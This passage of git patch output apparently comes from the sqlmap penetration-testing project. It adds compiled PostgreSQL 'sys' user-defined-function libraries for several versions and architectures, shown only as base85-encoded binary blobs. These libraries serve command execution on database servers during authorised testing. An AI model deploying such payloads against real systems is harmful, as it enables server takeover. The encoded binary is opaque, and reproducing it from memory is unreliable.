j?Dg~KTqyvBj_3AF3%p)(rbN?}PW#VI*z@!t2PZ*>YO<20

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..dd554a4190737fdfa728d0b909f84dd850572be8
GIT binary patch
literal 3248
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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..ab5b6a8e6f74bfea2e19db9ebfe5552773071af9
GIT binary patch
literal 3248
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

literal 0
HcmV?d00001


From ebc2a729c902502a62848b998b3067cbf5642904 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Jun 2015 16:24:28 +0200
Subject: [PATCH 434/492] Adding compiled UDFs for PostgreSQL 32-bit (9.2, 9.3
 and 9.4)

---
 .../linux/32/9.2/lib_postgresqludf_sys.so_       | Bin 0 -> 3166 bytes
 .../linux/32/9.3/lib_postgresqludf_sys.so_       | Bin 0 -> 3166 bytes
 .../linux/32/9.4/lib_postgresqludf_sys.so_       | Bin 0 -> 3167 bytes
 3 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
 create mode 100644 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
 create mode 100644 udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_

diff --git a/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..72bc101dbd9801e90b88c3e25ade009b05312837
GIT binary patch
literal 3166
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
EB#<vOF#rGn

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..3a0973d8482b63fa1057a79df0e5a8cf93d0c574
GIT binary patch
literal 3166
zcmV-k459M}oTVpn4=dGbzPs6kKLK)nR$sq<Je5+3h*yq=knkv7G&47E;knuD8AuTc
z*WI^g6K8`|$hxjP)wa^1ihK%ZrV5ymwkKAz7UDTYGh{E3&No;rf&vuMii&SuutMLx
z5VKGeu+H@DoI>~9^Suo2x%a&L_Y38k<wc#2TAoY#K241r6J8FbFVs*QOec9%87$Zv
zmOG25wLdRKgagL)yb+dPnN=l;O)I^g*t4Vn36@`lc7ooZ(pqwAsg%%}QOJ#XvXft#
zb~WhNk)Dn67wu^BCuSt^FH(yTx%|<wwe6GZ&xJ+)Yf|!Y`ZQ_IUfn~YPCINW|C5M{
zO1ALiara~#w`}F9@(0y$p0PVDh#9N$W0e?eGFqB6OM~bsqJ1hzofl=%dn*2Z(X7#e
zW#z#~q>j-WGDbAzw{MNp)aOq@Lr4M{Z5pZ?j2_`vnA<Ck{y&@1cpTKaC^6*i*_F-0
zk#(V)!8;(75w4jD&;h)lyz--d94yVWJks%kK%M}pGO9&D4D}Eg{i^hhG-S^~E<p7c
z_>0^|_Ex3QoJc_Y?1Rq?688h}@4F$g-!~G&D>7z5{-Kf4zb3kovP3%mMS38bqPL{T
z)n!A*=)r6KmTUPXiv1`o<V;qw2~%#*QdaivG?Cxa;7*>7YyGBcMp8PSpIw_Q{7^BG
z&!zZ8F!bva@!e}LmS9{VF|s<92$KDQ*>?PB@wbWJsljk>07xX*fxL(CXi5ic$(AG0
z&(JVk{v|Q;{eSVDl;l(@Mx5es65N}ah!A6&Hu_xj{$XnGSnkO++I&Emm%!(+YJ{)K
zGU^~${wTr_DH>TeGExzj<de-ICX$%s4@MhV*@#XSDl(PS7xg8ZV?o*Kt*IsE3%jgJ
z=6R<o=sDLnmMKhgn4ONNHzU0|swoc3oEe|b>Kvw7sm0vnus2D+%fcHJt5XIWuUorX
zi{0!xnYEamF}H;#?B0Y`ejJ`zC%3s;-zlFP6162S(-)Q98J|;1ni>FfT#XYF9$}l;
z6*9pPPDGi<?XkL;*Hr`f8?Vda*~$|#DcQ$EX{Xzl@-2hI#ox2Jy^q7T#qF}OmT9wx
zLKX?gVL0PAxXt0DF-%BpVF43CtMv{UldUnbU##1>+UXatX95x9U0Ein-5Kh-d7m(I
zdMdeP*@{Z5%9l2!#%<#w$?^{teqb6x{jhC<Wca`MP9ev*DaZ#4|MQo|+6&3K)kxh=
zX-wl372Q&CIB`>8E#(7I>)CGgM8su^3lc23O(YLk@pHllz^OfXr@Rw-r{oiSr#j_&
z;vA^4yTKM60eYNS<|x4yvDkDmblO1=nyheulf8rB)Y9L8(>)GnoN0kv;FRw;!B*Xm
zfh>z$;N-t_oW7U$!B(J?;I!EEfYXHXUPn@p7{L~9`Foscx*-oG8~eZ(p{;Tu2S-mI
zz}A2g+};M3*09jam*VmGj?)dg@><o_5JS<)IYaTcvEsz{Sk|fd0j#nKYaG4w6$3y8
